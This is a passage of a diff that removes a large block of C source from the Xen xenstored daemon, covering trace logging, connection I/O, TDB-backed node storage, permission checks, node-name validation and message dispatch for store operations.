-       case XS_IS_DOMAIN_INTRODUCED: return "XS_IS_DOMAIN_INTRODUCED";
-       case XS_RESUME: return "RESUME";
-       case XS_SET_TARGET: return "SET_TARGET";
-       default:
-               return "**UNKNOWN**";
-       }
-}
-
-void trace(const char *fmt, ...)
-{
-       va_list arglist;
-       char *str;
-       char sbuf[1024];
-       int ret, dummy;
-
-       if (tracefd < 0)
-               return;
-
-       /* try to use a static buffer */
-       va_start(arglist, fmt);
-       ret = vsnprintf(sbuf, 1024, fmt, arglist);
-       va_end(arglist);
-
-       if (ret <= 1024) {
-               dummy = write(tracefd, sbuf, ret);
-               return;
-       }
-
-       /* fail back to dynamic allocation */
-       va_start(arglist, fmt);
-       str = talloc_vasprintf(NULL, fmt, arglist);
-       va_end(arglist);
-       dummy = write(tracefd, str, strlen(str));
-       talloc_free(str);
-}
-
-static void trace_io(const struct connection *conn,
-                    const struct buffered_data *data,
-                    int out)
-{
-       unsigned int i;
-       time_t now;
-       struct tm *tm;
-
-#ifdef HAVE_DTRACE
-       dtrace_io(conn, data, out);
-#endif
-
-       if (tracefd < 0)
-               return;
-
-       now = time(NULL);
-       tm = localtime(&now);
-
-       trace("%s %p %04d%02d%02d %02d:%02d:%02d %s (",
-             out ? "OUT" : "IN", conn,
-             tm->tm_year + 1900, tm->tm_mon + 1,
-             tm->tm_mday, tm->tm_hour, tm->tm_min, tm->tm_sec,
-             sockmsg_string(data->hdr.msg.type));
-       
-       for (i = 0; i < data->hdr.msg.len; i++)
-               trace("%c", (data->buffer[i] != '\0') ? data->buffer[i] : ' ');
-       trace(")\n");
-}
-
-void trace_create(const void *data, const char *type)
-{
-       trace("CREATE %s %p\n", type, data);
-}
-
-void trace_destroy(const void *data, const char *type)
-{
-       trace("DESTROY %s %p\n", type, data);
-}
-
-/**
- * Signal handler for SIGHUP, which requests that the trace log is reopened
- * (in the main loop).  A single byte is written to reopen_log_pipe, to awaken
- * the select() in the main loop.
- */
-static void trigger_reopen_log(int signal __attribute__((unused)))
-{
-       char c = 'A';
-       int dummy;
-       dummy = write(reopen_log_pipe[1], &c, 1);
-}
-
-
-static void reopen_log(void)
-{
-       if (tracefile) {
-               if (tracefd > 0)
-                       close(tracefd);
-
-               tracefd = open(tracefile, O_WRONLY|O_CREAT|O_APPEND, 0600);
-
-               if (tracefd < 0)
-                       perror("Could not open tracefile");
-               else
-                       trace("\n***\n");
-       }
-}
-
-
-static bool write_messages(struct connection *conn)
-{
-       int ret;
-       struct buffered_data *out;
-
-       out = list_top(&conn->out_list, struct buffered_data, list);
-       if (out == NULL)
-               return true;
-
-       if (out->inhdr) {
-               if (verbose)
-                       xprintf("Writing msg %s (%.*s) out to %p\n",
-                               sockmsg_string(out->hdr.msg.type),
-                               out->hdr.msg.len,
-                               out->buffer, conn);
-               ret = conn->write(conn, out->hdr.raw + out->used,
-                                 sizeof(out->hdr) - out->used);
-               if (ret < 0)
-                       return false;
-
-               out->used += ret;
-               if (out->used < sizeof(out->hdr))
-                       return true;
-
-               out->inhdr = false;
-               out->used = 0;
-
-               /* Second write might block if non-zero. */
-               if (out->hdr.msg.len && !conn->domain)
-                       return true;
-       }
-
-       ret = conn->write(conn, out->buffer + out->used,
-                         out->hdr.msg.len - out->used);
-       if (ret < 0)
-               return false;
-
-       out->used += ret;
-       if (out->used != out->hdr.msg.len)
-               return true;
-
-       trace_io(conn, out, 1);
-
-       list_del(&out->list);
-       talloc_free(out);
-
-       return true;
-}
-
-static int destroy_conn(void *_conn)
-{
-       struct connection *conn = _conn;
-
-       /* Flush outgoing if possible, but don't block. */
-       if (!conn->domain) {
-               fd_set set;
-               struct timeval none;
-
-               FD_ZERO(&set);
-               FD_SET(conn->fd, &set);
-               none.tv_sec = none.tv_usec = 0;
-
-               while (!list_empty(&conn->out_list)
-                      && select(conn->fd+1, NULL, &set, NULL, &none) == 1)
-                       if (!write_messages(conn))
-                               break;
-               close(conn->fd);
-       }
-        if (conn->target)
-                talloc_unlink(conn, conn->target);
-       list_del(&conn->list);
-       trace_destroy(conn, "connection");
-       return 0;
-}
-
-
-static void set_fd(int fd, fd_set *set, int *max)
-{
-       if (fd < 0)
-               return;
-       FD_SET(fd, set);
-       if (fd > *max)
-               *max = fd;
-}
-
-
-static int initialize_set(fd_set *inset, fd_set *outset, int sock, int ro_sock,
-                         struct timeval **ptimeout)
-{
-       static struct timeval zero_timeout = { 0 };
-       struct connection *conn;
-       int max = -1;
-
-       *ptimeout = NULL;
-
-       FD_ZERO(inset);
-       FD_ZERO(outset);
-
-       set_fd(sock,               inset, &max);
-       set_fd(ro_sock,            inset, &max);
-       set_fd(reopen_log_pipe[0], inset, &max);
-
-       if (xce_handle != -1)
-               set_fd(xc_evtchn_fd(xce_handle), inset, &max);
-
-       list_for_each_entry(conn, &connections, list) {
-               if (conn->domain) {
-                       if (domain_can_read(conn) ||
-                           (domain_can_write(conn) &&
-                            !list_empty(&conn->out_list)))
-                               *ptimeout = &zero_timeout;
-               } else {
-                       set_fd(conn->fd, inset, &max);
-                       if (!list_empty(&conn->out_list))
-                               FD_SET(conn->fd, outset);
-               }
-       }
-
-       return max;
-}
-
-static int destroy_fd(void *_fd)
-{
-       int *fd = _fd;
-       close(*fd);
-       return 0;
-}
-
-/* Is child a subnode of parent, or equal? */
-bool is_child(const char *child, const char *parent)
-{
-       unsigned int len = strlen(parent);
-
-       /* / should really be "" for this algorithm to work, but that's a
-        * usability nightmare. */
-       if (streq(parent, "/"))
-               return true;
-
-       if (strncmp(child, parent, len) != 0)
-               return false;
-
-       return child[len] == '/' || child[len] == '\0';
-}
-
-/* If it fails, returns NULL and sets errno. */
-static struct node *read_node(struct connection *conn, const char *name)
-{
-       TDB_DATA key, data;
-       uint32_t *p;
-       struct node *node;
-       TDB_CONTEXT * context = tdb_context(conn);
-
-       key.dptr = (void *)name;
-       key.dsize = strlen(name);
-       data = tdb_fetch(context, key);
-
-       if (data.dptr == NULL) {
-               if (tdb_error(context) == TDB_ERR_NOEXIST)
-                       errno = ENOENT;
-               else {
-                       log("TDB error on read: %s", tdb_errorstr(context));
-                       errno = EIO;
-               }
-               return NULL;
-       }
-
-       node = talloc(name, struct node);
-       node->name = talloc_strdup(node, name);
-       node->parent = NULL;
-       node->tdb = tdb_context(conn);
-       talloc_steal(node, data.dptr);
-
-       /* Datalen, childlen, number of permissions */
-       p = (uint32_t *)data.dptr;
-       node->num_perms = p[0];
-       node->datalen = p[1];
-       node->childlen = p[2];
-
-       /* Permissions are struct xs_permissions. */
-       node->perms = (void *)&p[3];
-       /* Data is binary blob (usually ascii, no nul). */
-       node->data = node->perms + node->num_perms;
-       /* Children is strings, nul separated. */
-       node->children = node->data + node->datalen;
-
-       return node;
-}
-
-static bool write_node(struct connection *conn, const struct node *node)
-{
-       /*
-        * conn will be null when this is called from manual_node.
-        * tdb_context copes with this.
-        */
-
-       TDB_DATA key, data;
-       void *p;
-
-       key.dptr = (void *)node->name;
-       key.dsize = strlen(node->name);
-
-       data.dsize = 3*sizeof(uint32_t)
-               + node->num_perms*sizeof(node->perms[0])
-               + node->datalen + node->childlen;
-
-       if (domain_is_unprivileged(conn) && data.dsize >= quota_max_entry_size)
-               goto error;
-
-       data.dptr = talloc_size(node, data.dsize);
-       ((uint32_t *)data.dptr)[0] = node->num_perms;
-       ((uint32_t *)data.dptr)[1] = node->datalen;
-       ((uint32_t *)data.dptr)[2] = node->childlen;
-       p = data.dptr + 3 * sizeof(uint32_t);
-
-       memcpy(p, node->perms, node->num_perms*sizeof(node->perms[0]));
-       p += node->num_perms*sizeof(node->perms[0]);
-       memcpy(p, node->data, node->datalen);
-       p += node->datalen;
-       memcpy(p, node->children, node->childlen);
-
-       /* TDB should set errno, but doesn't even set ecode AFAICT. */
-       if (tdb_store(tdb_context(conn), key, data, TDB_REPLACE) != 0) {
-               corrupt(conn, "Write of %s failed", key.dptr);
-               goto error;
-       }
-       return true;
- error:
-       errno = ENOSPC;
-       return false;
-}
-
-static enum xs_perm_type perm_for_conn(struct connection *conn,
-                                      struct xs_permissions *perms,
-                                      unsigned int num)
-{
-       unsigned int i;
-       enum xs_perm_type mask = XS_PERM_READ|XS_PERM_WRITE|XS_PERM_OWNER;
-
-       if (!conn->can_write)
-               mask &= ~XS_PERM_WRITE;
-
-       /* Owners and tools get it all... */
-       if (!conn->id || perms[0].id == conn->id
-                || (conn->target && perms[0].id == conn->target->id))
-               return (XS_PERM_READ|XS_PERM_WRITE|XS_PERM_OWNER) & mask;
-
-       for (i = 1; i < num; i++)
-               if (perms[i].id == conn->id
-                        || (conn->target && perms[i].id == conn->target->id))
-                       return perms[i].perms & mask;
-
-       return perms[0].perms & mask;
-}
-
-static char *get_parent(const char *node)
-{
-       char *slash = strrchr(node + 1, '/');
-       if (!slash)
-               return talloc_strdup(node, "/");
-       return talloc_asprintf(node, "%.*s", (int)(slash - node), node);
-}
-
-/* What do parents say? */
-static enum xs_perm_type ask_parents(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       do {
-               name = get_parent(name);
-               node = read_node(conn, name);
-               if (node)
-                       break;
-       } while (!streq(name, "/"));
-
-       /* No permission at root?  We're in trouble. */
-       if (!node)
-               corrupt(conn, "No permissions file at root");
-
-       return perm_for_conn(conn, node->perms, node->num_perms);
-}
-
-/* We have a weird permissions system.  You can allow someone into a
- * specific node without allowing it in the parents.  If it's going to
- * fail, however, we don't want the errno to indicate any information
- * about the node. */
-static int errno_from_parents(struct connection *conn, const char *node,
-                             int errnum, enum xs_perm_type perm)
-{
-       /* We always tell them about memory failures. */
-       if (errnum == ENOMEM)
-               return errnum;
-
-       if (ask_parents(conn, node) & perm)
-               return errnum;
-       return EACCES;
-}
-
-/* If it fails, returns NULL and sets errno. */
-struct node *get_node(struct connection *conn,
-                     const char *name,
-                     enum xs_perm_type perm)
-{
-       struct node *node;
-
-       if (!name || !is_valid_nodename(name)) {
-               errno = EINVAL;
-               return NULL;
-       }
-       node = read_node(conn, name);
-       /* If we don't have permission, we don't have node. */
-       if (node) {
-               if ((perm_for_conn(conn, node->perms, node->num_perms) & perm)
-                   != perm) {
-                       errno = EACCES;
-                       node = NULL;
-               }
-       }
-       /* Clean up errno if they weren't supposed to know. */
-       if (!node) 
-               errno = errno_from_parents(conn, name, errno, perm);
-       return node;
-}
-
-static struct buffered_data *new_buffer(void *ctx)
-{
-       struct buffered_data *data;
-
-       data = talloc_zero(ctx, struct buffered_data);
-       if (data == NULL)
-               return NULL;
-       
-       data->inhdr = true;
-       return data;
-}
-
-/* Return length of string (including nul) at this offset.
- * If there is no nul, returns 0 for failure.
- */
-static unsigned int get_string(const struct buffered_data *data,
-                              unsigned int offset)
-{
-       const char *nul;
-
-       if (offset >= data->used)
-               return 0;
-
-       nul = memchr(data->buffer + offset, 0, data->used - offset);
-       if (!nul)
-               return 0;
-
-       return nul - (data->buffer + offset) + 1;
-}
-
-/* Break input into vectors, return the number, fill in up to num of them.
- * Always returns the actual number of nuls in the input.  Stores the
- * positions of the starts of the nul-terminated strings in vec.
- * Callers who use this and then rely only on vec[] will
- * ignore any data after the final nul.
- */
-unsigned int get_strings(struct buffered_data *data,
-                        char *vec[], unsigned int num)
-{
-       unsigned int off, i, len;
-
-       off = i = 0;
-       while ((len = get_string(data, off)) != 0) {
-               if (i < num)
-                       vec[i] = data->buffer + off;
-               i++;
-               off += len;
-       }
-       return i;
-}
-
-void send_reply(struct connection *conn, enum xsd_sockmsg_type type,
-               const void *data, unsigned int len)
-{
-       struct buffered_data *bdata;
-
-       /* Message is a child of the connection context for auto-cleanup. */
-       bdata = new_buffer(conn);
-       bdata->buffer = talloc_array(bdata, char, len);
-
-       /* Echo request header in reply unless this is an async watch event. */
-       if (type != XS_WATCH_EVENT) {
-               memcpy(&bdata->hdr.msg, &conn->in->hdr.msg,
-                      sizeof(struct xsd_sockmsg));
-       } else {
-               memset(&bdata->hdr.msg, 0, sizeof(struct xsd_sockmsg));
-       }
-
-       /* Update relevant header fields and fill in the message body. */
-       bdata->hdr.msg.type = type;
-       bdata->hdr.msg.len = len;
-       memcpy(bdata->buffer, data, len);
-
-       /* Queue for later transmission. */
-       list_add_tail(&bdata->list, &conn->out_list);
-}
-
-/* Some routines (write, mkdir, etc) just need a non-error return */
-void send_ack(struct connection *conn, enum xsd_sockmsg_type type)
-{
-       send_reply(conn, type, "OK", sizeof("OK"));
-}
-
-void send_error(struct connection *conn, int error)
-{
-       unsigned int i;
-
-       for (i = 0; error != xsd_errors[i].errnum; i++) {
-               if (i == ARRAY_SIZE(xsd_errors) - 1) {
-                       eprintf("xenstored: error %i untranslatable", error);
-                       i = 0;  /* EINVAL */
-                       break;
-               }
-       }
-       send_reply(conn, XS_ERROR, xsd_errors[i].errstring,
-                         strlen(xsd_errors[i].errstring) + 1);
-}
-
-static bool valid_chars(const char *node)
-{
-       /* Nodes can have lots of crap. */
-       return (strspn(node, 
-                      "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-                      "abcdefghijklmnopqrstuvwxyz"
-                      "0123456789-/_@") == strlen(node));
-}
-
-bool is_valid_nodename(const char *node)
-{
-       /* Must start in /. */
-       if (!strstarts(node, "/"))
-               return false;
-
-       /* Cannot end in / (unless it's just "/"). */
-       if (strends(node, "/") && !streq(node, "/"))
-               return false;
-
-       /* No double //. */
-       if (strstr(node, "//"))
-               return false;
-
-       if (strlen(node) > XENSTORE_ABS_PATH_MAX)
-               return false;
-
-       return valid_chars(node);
-}
-
-/* We expect one arg in the input: return NULL otherwise.
- * The payload must contain exactly one nul, at the end.
- */
-static const char *onearg(struct buffered_data *in)
-{
-       if (!in->used || get_string(in, 0) != in->used)
-               return NULL;
-       return in->buffer;
-}
-
-static char *perms_to_strings(const void *ctx,
-                             struct xs_permissions *perms, unsigned int num,
-                             unsigned int *len)
-{
-       unsigned int i;
-       char *strings = NULL;
-       char buffer[MAX_STRLEN(unsigned int) + 1];
-
-       for (*len = 0, i = 0; i < num; i++) {
-               if (!xs_perm_to_string(&perms[i], buffer, sizeof(buffer)))
-                       return NULL;
-
-               strings = talloc_realloc(ctx, strings, char,
-                                        *len + strlen(buffer) + 1);
-               strcpy(strings + *len, buffer);
-               *len += strlen(buffer) + 1;
-       }
-       return strings;
-}
-
-char *canonicalize(struct connection *conn, const char *node)
-{
-       const char *prefix;
-
-       if (!node || (node[0] == '/') || (node[0] == '@'))
-               return (char *)node;
-       prefix = get_implicit_path(conn);
-       if (prefix)
-               return talloc_asprintf(node, "%s/%s", prefix, node);
-       return (char *)node;
-}
-
-bool check_event_node(const char *node)
-{
-       if (!node || !strstarts(node, "@")) {
-               errno = EINVAL;
-               return false;
-       }
-       return true;
-}
-
-static void send_directory(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_READ);
-       if (!node) {
-               send_error(conn, errno);
-               return;
-       }
-
-       send_reply(conn, XS_DIRECTORY, node->children, node->childlen);
-}
-
-static void do_read(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_READ);
-       if (!node) {
-               send_error(conn, errno);
-               return;
-       }
-
-       send_reply(conn, XS_READ, node->data, node->datalen);
-}
-
-static void delete_node_single(struct connection *conn, struct node *node)
-{
-       TDB_DATA key;
-
-       key.dptr = (void *)node->name;
-       key.dsize = strlen(node->name);
-
-       if (tdb_delete(tdb_context(conn), key) != 0) {
-               corrupt(conn, "Could not delete '%s'", node->name);
-               return;
-       }
-       domain_entry_dec(conn, node);
-}
-
-/* Must not be / */
-static char *basename(const char *name)
-{
-       return strrchr(name, '/') + 1;
-}
-
-static struct node *construct_node(struct connection *conn, const char *name)
-{
-       const char *base;
-       unsigned int baselen;
-       struct node *parent, *node;
-       char *children, *parentname = get_parent(name);
-
-       /* If parent doesn't exist, create it. */
-       parent = read_node(conn, parentname);
-       if (!parent)
-               parent = construct_node(conn, parentname);
-       if (!parent)
-               return NULL;
-
-       if (domain_entry(conn) >= quota_nb_entry_per_domain)
-               return NULL;
-
-       /* Add child to parent. */
-       base = basename(name);
-       baselen = strlen(base) + 1;
-       children = talloc_array(name, char, parent->childlen + baselen);
-       memcpy(children, parent->children, parent->childlen);
-       memcpy(children + parent->childlen, base, baselen);
-       parent->children = children;
-       parent->childlen += baselen;
-
-       /* Allocate node */
-       node = talloc(name, struct node);
-       node->tdb = tdb_context(conn);
-       node->name = talloc_strdup(node, name);
-
-       /* Inherit permissions, except domains own what they create */
-       node->num_perms = parent->num_perms;
-       node->perms = talloc_memdup(node, parent->perms,
-                                   node->num_perms * sizeof(node->perms[0]));
-       if (conn && conn->id)
-               node->perms[0].id = conn->id;
-
-       /* No children, no data */
-       node->children = node->data = NULL;
-       node->childlen = node->datalen = 0;
-       node->parent = parent;
-       domain_entry_inc(conn, node);
-       return node;
-}
-
-static int destroy_node(void *_node)
-{
-       struct node *node = _node;
-       TDB_DATA key;
-
-       if (streq(node->name, "/"))
-               corrupt(NULL, "Destroying root node!");
-
-       key.dptr = (void *)node->name;
-       key.dsize = strlen(node->name);
-
-       tdb_delete(node->tdb, key);
-       return 0;
-}
-
-static struct node *create_node(struct connection *conn, 
-                               const char *name,
-                               void *data, unsigned int datalen)
-{
-       struct node *node, *i;
-
-       node = construct_node(conn, name);
-       if (!node)
-               return NULL;
-
-       node->data = data;
-       node->datalen = datalen;
-
-       /* We write out the nodes down, setting destructor in case
-        * something goes wrong. */
-       for (i = node; i; i = i->parent) {
-               if (!write_node(conn, i)) {
-                       domain_entry_dec(conn, i);
-                       return NULL;
-               }
-               talloc_set_destructor(i, destroy_node);
-       }
-
-       /* OK, now remove destructors so they stay around */
-       for (i = node; i; i = i->parent)
-               talloc_set_destructor(i, NULL);
-       return node;
-}
-
-/* path, data... */
-static void do_write(struct connection *conn, struct buffered_data *in)
-{
-       unsigned int offset, datalen;
-       struct node *node;
-       char *vec[1] = { NULL }; /* gcc4 + -W + -Werror fucks code. */
-       char *name;
-
-       /* Extra "strings" can be created by binary data. */
-       if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       offset = strlen(vec[0]) + 1;
-       datalen = in->used - offset;
-
-       name = canonicalize(conn, vec[0]);
-       node = get_node(conn, name, XS_PERM_WRITE);
-       if (!node) {
-               /* No permissions, invalid input? */
-               if (errno != ENOENT) {
-                       send_error(conn, errno);
-                       return;
-               }
-               node = create_node(conn, name, in->buffer + offset, datalen);
-               if (!node) {
-                       send_error(conn, errno);
-                       return;
-               }
-       } else {
-               node->data = in->buffer + offset;
-               node->datalen = datalen;
-               if (!write_node(conn, node)){
-                       send_error(conn, errno);
-                       return;
-               }
-       }
-
-       add_change_node(conn->transaction, name, false);
-       fire_watches(conn, name, false);
-       send_ack(conn, XS_WRITE);
-}
-
-static void do_mkdir(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_WRITE);
-
-       /* If it already exists, fine. */
-       if (!node) {
-               /* No permissions? */
-               if (errno != ENOENT) {
-                       send_error(conn, errno);
-                       return;
-               }
-               node = create_node(conn, name, NULL, 0);
-               if (!node) {
-                       send_error(conn, errno);
-                       return;
-               }
-               add_change_node(conn->transaction, name, false);
-               fire_watches(conn, name, false);
-       }
-       send_ack(conn, XS_MKDIR);
-}
-
-static void delete_node(struct connection *conn, struct node *node)
-{
-       unsigned int i;
-
-       /* Delete self, then delete children.  If we crash, then the worst
-          that can happen is the children will continue to take up space, but
-          will otherwise be unreachable. */
-       delete_node_single(conn, node);
-
-       /* Delete children, too. */
-       for (i = 0; i < node->childlen; i += strlen(node->children+i) + 1) {
-               struct node *child;
-
-               child = read_node(conn, 
-                                 talloc_asprintf(node, "%s/%s", node->name,
-                                                 node->children + i));
-               if (child) {
-                       delete_node(conn, child);
-               }
-               else {
-                       trace("delete_node: No child '%s/%s' found!\n",
-                             node->name, node->children + i);
-                       /* Skip it, we've already deleted the parent. */
-               }
-       }
-}
-
-
-/* Delete memory using memmove. */
-static void memdel(void *mem, unsigned off, unsigned len, unsigned total)
-{
-       memmove(mem + off, mem + off + len, total - off - len);
-}
-
-
-static bool remove_child_entry(struct connection *conn, struct node *node,
-                              size_t offset)
-{
-       size_t childlen = strlen(node->children + offset);
-       memdel(node->children, offset, childlen + 1, node->childlen);
-       node->childlen -= childlen + 1;
-       return write_node(conn, node);
-}
-
-
-static bool delete_child(struct connection *conn,
-                        struct node *node, const char *childname)
-{
-       unsigned int i;
-
-       for (i = 0; i < node->childlen; i += strlen(node->children+i) + 1) {
-               if (streq(node->children+i, childname)) {
-                       return remove_child_entry(conn, node, i);
-               }
-       }
-       corrupt(conn, "Can't find child '%s' in %s", childname, node->name);
-       return false;
-}
-
-
-static int _rm(struct connection *conn, struct node *node, const char *name)
-{
-       /* Delete from parent first, then if we crash, the worst that can
-          happen is the child will continue to take up space, but will
-          otherwise be unreachable. */
-       struct node *parent = read_node(conn, get_parent(name));
-       if (!parent) {
-               send_error(conn, EINVAL);
-               return 0;
-       }
-
-       if (!delete_child(conn, parent, basename(name))) {
-               send_error(conn, EINVAL);
-               return 0;
-       }
-
-       delete_node(conn, node);
-       return 1;
-}
-
-
-static void internal_rm(const char *name)
-{
-       char *tname = talloc_strdup(NULL, name);
-       struct node *node = read_node(NULL, tname);
-       if (node)
-               _rm(NULL, node, tname);
-       talloc_free(node);
-       talloc_free(tname);
-}
-
-
-static void do_rm(struct connection *conn, const char *name)
-{
-       struct node *node;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_WRITE);
-       if (!node) {
-               /* Didn't exist already?  Fine, if parent exists. */
-               if (errno == ENOENT) {
-                       node = read_node(conn, get_parent(name));
-                       if (node) {
-                               send_ack(conn, XS_RM);
-                               return;
-                       }
-                       /* Restore errno, just in case. */
-                       errno = ENOENT;
-               }
-               send_error(conn, errno);
-               return;
-       }
-
-       if (streq(name, "/")) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       if (_rm(conn, node, name)) {
-               add_change_node(conn->transaction, name, true);
-               fire_watches(conn, name, true);
-               send_ack(conn, XS_RM);
-       }
-}
-
-
-static void do_get_perms(struct connection *conn, const char *name)
-{
-       struct node *node;
-       char *strings;
-       unsigned int len;
-
-       name = canonicalize(conn, name);
-       node = get_node(conn, name, XS_PERM_READ);
-       if (!node) {
-               send_error(conn, errno);
-               return;
-       }
-
-       strings = perms_to_strings(node, node->perms, node->num_perms, &len);
-       if (!strings)
-               send_error(conn, errno);
-       else
-               send_reply(conn, XS_GET_PERMS, strings, len);
-}
-
-static void do_set_perms(struct connection *conn, struct buffered_data *in)
-{
-       unsigned int num;
-       struct xs_permissions *perms;
-       char *name, *permstr;
-       struct node *node;
-
-       num = xs_count_strings(in->buffer, in->used);
-       if (num < 2) {
-               send_error(conn, EINVAL);
-               return;
-       }
-
-       /* First arg is node name. */
-       name = canonicalize(conn, in->buffer);
-       permstr = in->buffer + strlen(in->buffer) + 1;
-       num--;
-
-       /* We must own node to do this (tools can do this too). */
-       node = get_node(conn, name, XS_PERM_WRITE|XS_PERM_OWNER);
-       if (!node) {
-               send_error(conn, errno);
-               return;
-       }
-
-       perms = talloc_array(node, struct xs_permissions, num);
-       if (!xs_strings_to_perms(perms, num, permstr)) {
-               send_error(conn, errno);
-               return;
-       }
-
-       /* Unprivileged domains may not change the owner. */
-       if (domain_is_unprivileged(conn) &&
-           perms[0].id != node->perms[0].id) {
-               send_error(conn, EPERM);
-               return;
-       }
-
-       domain_entry_dec(conn, node);
-       node->perms = perms;
-       node->num_perms = num;
-       domain_entry_inc(conn, node);
-
-       if (!write_node(conn, node)) {
-               send_error(conn, errno);
-               return;
-       }
-
-       add_change_node(conn->transaction, name, false);
-       fire_watches(conn, name, false);
-       send_ack(conn, XS_SET_PERMS);
-}
-
-static void do_debug(struct connection *conn, struct buffered_data *in)
-{
-       int num;
-
-       if (conn->id != 0) {
-               send_error(conn, EACCES);
-               return;
-       }
-
-       num = xs_count_strings(in->buffer, in->used);
-
-       if (streq(in->buffer, "print")) {
-               if (num < 2) {
-                       send_error(conn, EINVAL);
-                       return;
-               }
-               xprintf("debug: %s", in->buffer + get_string(in, 0));
-       }
-
-       if (streq(in->buffer, "check"))
-               check_store();
-
-       send_ack(conn, XS_DEBUG);
-}
-
-/* Process "in" for conn: "in" will vanish after this conversation, so
- * we can talloc off it for temporary variables.  May free "conn".
- */
-static void process_message(struct connection *conn, struct buffered_data *in)
-{
-       struct transaction *trans;
-
-       trans = transaction_lookup(conn, in->hdr.msg.tx_id);
-       if (IS_ERR(trans)) {
-               send_error(conn, -PTR_ERR(trans));
-               return;
-       }
-
-       assert(conn->transaction == NULL);
-       conn->transaction = trans;
-
-       switch (in->hdr.msg.type) {
-       case XS_DIRECTORY:
-               send_directory(conn, onearg(in));
-               break;
-
-       case XS_READ:
-               do_read(conn, onearg(in));
-               break;
-
-       case XS_WRITE:
-               do_write(conn, in);
-               break;
-
-       case XS_MKDIR:
-               do_mkdir(conn, onearg(in));
-               break;
-
-       case XS_RM:
-               do_rm(conn, onearg(in));
-               break;
-
-       case XS_GET_PERMS:
-               do_get_perms(conn, onearg(in));
-               break;
-
-       case XS_SET_PERMS:
-               do_set_perms(conn, in);
-               break;
-
-       case XS_DEBUG:
-               do_debug(conn, in);
-               break;
-
-       case XS_WATCH:
-               do_watch(conn, in);
-               break;
-
-       case XS_UNWATCH:
-               do_unwatch(conn, in);
-               break;
-
-       case XS_TRANSACTION_START:
-               do_transaction_start(conn, in);
-               break;
-
-       case XS_TRANSACTION_END:
-               do_transaction_end(conn, onearg(in));
-               break;
-
-       case XS_INTRODUCE:
-               do_introduce(conn, in);
-               break;
-
-       case XS_IS_DOMAIN_INTRODUCED:
-               do_is_domain_introduced(conn, onearg(in));
-               break;
-
-       case XS_RELEASE:
-               do_release(conn, onearg(in));
-               break;
-
-       case XS_GET_DOMAIN_PATH:
-               do_get_domain_path(conn, onearg(in));
-               break;
-
-       case XS_RESUME:
-               do_resume(conn, onearg(in));
-               break;
-
-       case XS_SET_TARGET:
-               do_set_target(conn, in);
-               break;
-
-       default:
-               eprintf("Client unknown operation %i", in->hdr.msg.type);
-               send_error(conn, ENOSYS);
-               break;
-       }
-
-       conn->transaction = NULL;
-}
-
-static void consider_message(struct connection *conn)
-{
-       if (verbose)
-               xprintf("Got message %s len %i from %p\n",
-                       sockmsg_string(conn->in->hdr.msg.type),
-                       conn->in->hdr.msg.len, conn);
-
-       process_message(conn, conn->in);
-
-       talloc_free(conn->in);
-       conn->in = new_buffer(conn);
-}
-
-/* Errors in reading or allocating here mean we get out of sync, so we
- * drop the whole client connection. */
-static void handle_input(struct connection *conn)
-{
-       int bytes;
-       struct buffered_data *in = conn->in;
-
-       /* Not finished header yet? */
-       if (in->inhdr) {
-               bytes = conn->read(conn, in->hdr.raw + in->used,
-                                  sizeof(in->hdr) - in->used);
-               if (bytes < 0)
-                       goto bad_client;
-               in->used += bytes;
-               if (in->used != sizeof(in->hdr))
-                       return;
-
-               if (in->hdr.msg.len > XENSTORE_PAYLOAD_MAX) {
-                       syslog(LOG_ERR, "Client tried to feed us %i",
-                              in->hdr.msg.len);
-                       goto bad_client;
-               }
-
-               in->buffer = talloc_array(in, char, in->hdr.msg.len);
-               if (!in->buffer)
-                       goto bad_client;
-               in->used = 0;
-               in->inhdr = false;
-               return;
-       }
-
-       bytes = conn->read(conn, in->buffer + in->used,
-                          in->hdr.msg.len - in->used);
-       if (bytes < 0)
-               goto bad_client;
-
-       in->used += bytes;
-       if (in->used != in->hdr.msg.len)
-               return;
-
-       trace_io(conn, in, 0);
-       consider_message(conn);
-       return;
-
-bad_client:
-       /* Kill it. */
-       talloc_free(conn);
-}
-
-static void handle_output(struct connection *conn)
-{
-       if (!write_messages(conn))
-               talloc_free(conn);
-}
-
-struct connection *new_connection(connwritefn_t *write, connreadfn_t *read)
-{
-       struct connection *new;
-
-       new = talloc_zero(talloc_autofree_context(), struct connection);
-       if (!new)
-               return NULL;
-
-       new->fd = -1;
-       new->write = write;
-       new->read = read;
-       new->can_write = true;
-       new->transaction_started = 0;
-       INIT_LIST_HEAD(&new->out_list);
-       INIT_LIST_HEAD(&new->watches);
-       INIT_LIST_HEAD(&new->transaction_list);
-
-       new->in = new_buffer(new);
-       if (new->in == NULL) {
-               talloc_free(new);
-               return NULL;
-       }
-
-       list_add_tail(&new->list, &connections);
-       talloc_set_destructor(new, destroy_conn);
-       trace_create(new, "connection");
-       return new;
-}
-
-static int writefd(struct connection *conn, const void *data, unsigned int len)
-{
-       int rc;
-
-       while ((rc = write(conn->fd, data, len)) < 0) {
-               if (errno == EAGAIN) {
-                       rc = 0;
-                       break;
-               }
-               if (errno != EINTR)
-                       break;
-       }
-
-       return rc;
-}
-
-static int readfd(struct connection *conn, void *data, unsigned int len)
-{
-       int rc;
-
-       while ((rc = read(conn->fd, data, len)) < 0) {
-               if (errno == EAGAIN) {
-                       rc = 0;
-                       break;
-               }
-               if (errno != EINTR)
-                       break;
-       }
-
-       /* Reading zero length means we're done with this connection. */
-       if ((rc == 0) && (len != 0)) {
-               errno = EBADF;
-               rc = -1;
-       }
-
-       return rc;
-}
-
-static void accept_connection(int sock, bool canwrite)
-{
-       int fd;
-       struct connection *conn;
-
-       fd = accept(sock, NULL, NULL);
-       if (fd < 0)
-               return;
-
-       conn = new_connection(writefd, readfd);
-       if (conn) {
-               conn->fd = fd;
-               conn->can_write = canwrite;
-       } else
-               close(fd);
-}
-
-#define TDB_FLAGS 0
-
-/* We create initial nodes manually. */
-static void manual_node(const char *name, const char *child)
-{
